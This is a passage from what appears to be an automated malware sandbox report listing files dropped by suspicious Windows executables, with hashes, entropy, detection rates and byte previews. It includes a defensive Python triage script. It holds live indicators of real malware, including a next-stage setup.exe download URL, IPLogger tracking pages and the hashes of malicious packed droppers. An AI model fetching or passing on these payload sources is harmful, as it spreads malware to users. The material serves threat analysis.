                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
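The rows above are the report's flattened Key:Value tables, one per dropped file. As an added example (not Joe Sandbox's code), the script below parses that format into one record per file, recomputes the 8-bit Shannon entropy scale behind the "Entropy (8bit)" field, and triages each record: PE magic versus the Apache 301 page that was saved in place of a binary (its href is the next-stage URL worth blocking), a local packing threshold beside the report's own Encrypted flag, and the case where the sandbox marks a file Malicious while ReversingLabs reports 0%. The sample input is constructed from four of the rows above with long fields cut; the 7.9 threshold and the output field names are assumptions of this example.

```python
"""Triage helpers for the dropped-file records above. Added example, not
Joe Sandbox code: parses the flattened Key:Value rows, recomputes the 8-bit
entropy scale and separates PE payloads from an HTML page saved as a binary."""
import math
import re
from collections import Counter

# Constructed sample: four records abridged from the rows above (hashes and
# previews are the report's, long fields cut). The first record is truncated
# at the top exactly as on the page, so the parser must not rely on "Process:".
SAMPLE = r"""
Entropy (8bit):5.301576517537887
Encrypted:false
MD5:9C979EB881F53B52060142DC127ACC6D
Malicious:false
Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://c.574859385.xyz/525403/setup.exe">here</a>.</p>.<hr>.<address>Apache/2.4.55 (Unix) Server at monoblocked.com Port 80</address>.</body></html>.
Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):3887542
Entropy (8bit):7.99823692801362
Encrypted:true
MD5:74152089D68E8AE68267DD6A8803A5E5
Malicious:true
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7
Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Size (bytes):11214848
Entropy (8bit):7.97772484802616
Encrypted:false
MD5:B091C4848287BE6601D720997394D453
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 88%
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
MD5:550686C0EE48C386DFCB40199BD076AC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L
"""

PACKED_ENTROPY = 7.9  # assumption: local packer/crypter cut-off, not the report's
HREF_RE = re.compile(r'href="([^"]+)"')


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0 (the 'Entropy (8bit)' scale)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_records(text: str) -> list[dict]:
    """One dict per dropped file. A new record starts at 'Process:' or when a
    key repeats, so a record cut off at the top of the page still parses."""
    records: list[dict] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, _, value = line.partition(":")  # first colon only; values may contain ':'
        key, value = key.strip(), value.strip()
        if cur is None or key == "Process" or key in cur:
            cur = {}
            records.append(cur)
        if key.startswith("•"):  # "• Antivirus: ReversingLabs, Detection: 88%"
            m = re.search(r"Detection:\s*(\d+)%", value)
            cur["detection_pct"] = int(m.group(1)) if m else None
        else:
            cur[key] = value
    return records


def triage(rec: dict) -> dict:
    """Classify one record; every field is derived from the record itself."""
    preview = rec.get("Preview", "")
    entropy = float(rec.get("Entropy (8bit)", "0"))
    is_pe = preview.startswith("MZ")
    is_html = "<html" in preview.lower()
    m = HREF_RE.search(preview) if is_html else None
    return {
        "md5": rec.get("MD5"),
        "pe": is_pe,
        "report_encrypted": rec.get("Encrypted") == "true",
        "likely_packed": is_pe and entropy >= PACKED_ENTROPY,
        "html_instead_of_binary": is_html and not is_pe,
        "redirect_target": m.group(1) if m else None,  # next-stage URL to block
        # sandbox verdict with no static AV hit: behaviour-based, keep the hash
        "behavioural_only": rec.get("Malicious") == "true" and rec.get("detection_pct") == 0,
    }


def triage_all(text: str) -> list[dict]:
    return [triage(r) for r in parse_records(text)]
```

Run `triage_all(SAMPLE)` to get one dict per record. Note that the report flags only the 7.998-entropy PE as Encrypted while the 7.977 one is not, so a flat 7.9 cut-off is looser than the tool's own heuristic; use the local flag to queue samples for unpacking rather than as a verdict. The two DLLs with 0% static detection but Malicious:true are the behavioural-only hits: their hashes are still worth blocking even though no AV engine names them.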
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:4E52D739C324DB8225BD9AB2695F262F
SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):325120
Entropy (8bit):6.52662580847976
Encrypted:false
SSDEEP:3072:OU7+A0a8Ga/QpfLEnbp+sQAZXX6Gr+GM1ny3JRQPEM0YPVH0HZ+i01OYKbO5X0CO:QQa/QpGrtO2APEVYPw+3OYc5KqbI
MD5:0BAE95163FC9DD6EED4854D33084096F
SHA1:985F5CF9D15FC9B859D8C2F7A9607B0824A80B4F
SHA-256:65A7B796D7C0DB8377C48FB5388FA149A10C17B5E511C3B5392EF55E0656A220
SHA-512:AFE5BFA20DEB38BFEB4A30ECDEF9C71CB8402DA9EF14BAC653C9828F9452E851FD1BEFAA49D4096B7443A3C982C7E6593AEA5256D93820C1116B098186766458
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):80880
Entropy (8bit):6.920480786566406
Encrypted:false
SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:A37EE36B536409056A86F50E67777DD7
SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:Nlllulrogh:NllU8g
MD5:5BC33C315308F593C5554C76087D7AD2
SHA1:63B5F34BD7CFF796A1815A9209B2DFA940DD6E9F
SHA-256:0A3CFFB1EC9999AD829D78A96CA7C2206C703DB59BE9DFFFE6228F035D680349
SHA-512:730B30C3A08A7818BA684497D3D42F6AC0006D5E55BF8AF17E35C2684721DCB00742902E3E6E074858CE3367B6EFC96CD47FA14A516C37A7D7A77FDE86A7ACA5
Malicious:false
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6711576
Entropy (8bit):7.996143373588409
Encrypted:true
SSDEEP:196608:91OVbE7giOz8u70OteFI7tfL6TCdPeMLN3Ie:3OmBOUIECdVLN4e
MD5:AAA56797070369AD346FBD9BB6CC5E8B
SHA1:A1D01943F0A354D3A000628262671254CA6A91B8
SHA-256:9D7D08AC35F0113F7C814D257BF88B8222975AAA0A3FDEDA88AC7185DBC50905
SHA-512:E69D25A158567C6BCE6E9450DE17D0814B9B9C11F4BB31E5DCC3E8B4378062CC7E31DA625F6BA4A2280B393034A6C832A0FC0A1E16364DC7E8C8146DE245B5BE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation:unknown
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884110439415429
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:f0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwN:SPMki6zio75L3pf3dedO4keCIwkoYbgt
                                                                                                                                                                                                                                MD5:409B00F4B0A921D4691FE3EFB0AD4092
                                                                                                                                                                                                                                SHA1:C3F647B65D5C473D834CEBB04FB2DBC3E51CC83A
                                                                                                                                                                                                                                SHA-256:169282F6539507ABB50AAAB68EC6CFF09373DC3E6EB104F34BD762897221AFBE
                                                                                                                                                                                                                                SHA-512:C21EF7B0499D570870B493523AEB18F46700980B252507DBCC6F6D4E2791CD9F65197286DACE3D7B2F55160E500ECEE688B3DD5324DE7350B61913332006EA5D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....C.R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884110624330654
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:S0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwT:pPMki6zio75L3pf3dedO4keCIwkoYbgz
                                                                                                                                                                                                                                MD5:2CF99CA2E0CB98555FCA7D2FB3187553
                                                                                                                                                                                                                                SHA1:9E822489CFF5EB8CDB1D9FA25A3AB1F1CE22C3E1
                                                                                                                                                                                                                                SHA-256:4BEDF8A334DC13995596AC4C7A7D9B0316B2201669F083ED4F356350BD0F5672
                                                                                                                                                                                                                                SHA-512:D6AF12152138676A030BE5D562FB41DAE9A9588DB3775745FF8AF676485AABAAB5620580C9E40B8DE1716EE6B3A91F992DAEE85B7F923A23570EB3A1D7890117
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......!S...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):217
Entropy (8bit):4.847701720310414
Encrypted:false
SSDEEP:6:YSAILzPlouBDm4M5NW1RhQyiOJBJHksCW1RAQH8m4n:YSLrlZDm4M52iGBvfH8m4n
MD5:0877F3D72379DA38CEAC5792BC9FDD4F
SHA1:19423305BBC320D576F1337A750313818347BEAC
SHA-256:CB56400EB931EAA859366E9E6605082FAD1E82FE749210B817CEBCE9B34537DB
SHA-512:8B874F11E8D0C73578E01D2B9E2A971C51B68DADD33BFA6218D7096FF2219BB6CA37E16ADE02B985A5A388238B96644F4906523AC93FEB84F206D623E67719B2
Malicious:false
Reputation:unknown
Preview:{"welcome-url":"https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767__456&utm_medium=apb&utm_source=mkt&http_referrer=&query=/opera/stable/windows/?utm_medium=apb%26utm_source=mkt%26utm_campaign=767__456"}
Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):108904768
Entropy (8bit):7.999992128605643
Encrypted:true
SSDEEP:3145728:YDgMyHlLTo4mgZPPi6fhDCU3QPoBLdydj+o:Y8MyHSVgZP66f+GLdy8o
MD5:4936231C48634B100429F03AD2DA9441
SHA1:AD9D994173CEAF384CE808B12F7D10563ECD8A1D
SHA-256:C5B7FCC93B1ED8B24F3C7BE9D736401F2AC8C5FCAA270092A58D735F5630F3A7
SHA-512:45C86456B42C64524729A2AD3F2B058EAFFF733200F376E7E346A84BEA9B0E55641DBDB22A7C79622BAD1B993A4B7B26E741F6848B61F84382B4E3E464407A66
Malicious:true
Reputation:unknown
Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):75376868
Entropy (8bit):7.9999894437147185
Encrypted:true
SSDEEP:1572864:YD25bzM5M7jd2r6lLcoo4V7eS8gZPPzSF6fhqqQBUCgBP:YDgMyHlLTo4mgZPPi6fhDCUP
MD5:6B64F2F89414D6D99135AF3049F690B7
SHA1:C553E7BA21866BAF8106281BC483A8E3D30F0142
SHA-256:B3135D41A0905E51963C5C635AEBB2B8A4410D83BDD07151B5ABDF7EE9317890
SHA-512:6F4E1B56AAC0A34B55C643F13E226DC1B42289231475CDAC1310AC30C57BE61AFA78C8AEE3E980BD22C550B5FF025E418D71B6F488BC4407959D28C5A2825C8F
Malicious:true
Reputation:unknown
Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884110439415429
Encrypted:false
SSDEEP:98304:f0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwN:SPMki6zio75L3pf3dedO4keCIwkoYbgt
MD5:409B00F4B0A921D4691FE3EFB0AD4092
SHA1:C3F647B65D5C473D834CEBB04FB2DBC3E51CC83A
SHA-256:169282F6539507ABB50AAAB68EC6CFF09373DC3E6EB104F34BD762897221AFBE
SHA-512:C21EF7B0499D570870B493523AEB18F46700980B252507DBCC6F6D4E2791CD9F65197286DACE3D7B2F55160E500ECEE688B3DD5324DE7350B61913332006EA5D
Malicious:true
Reputation:unknown
Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
File Type:ASCII text, with very long lines (533)
Category:dropped
Size (bytes):4576
Entropy (8bit):5.589736914921227
Encrypted:false
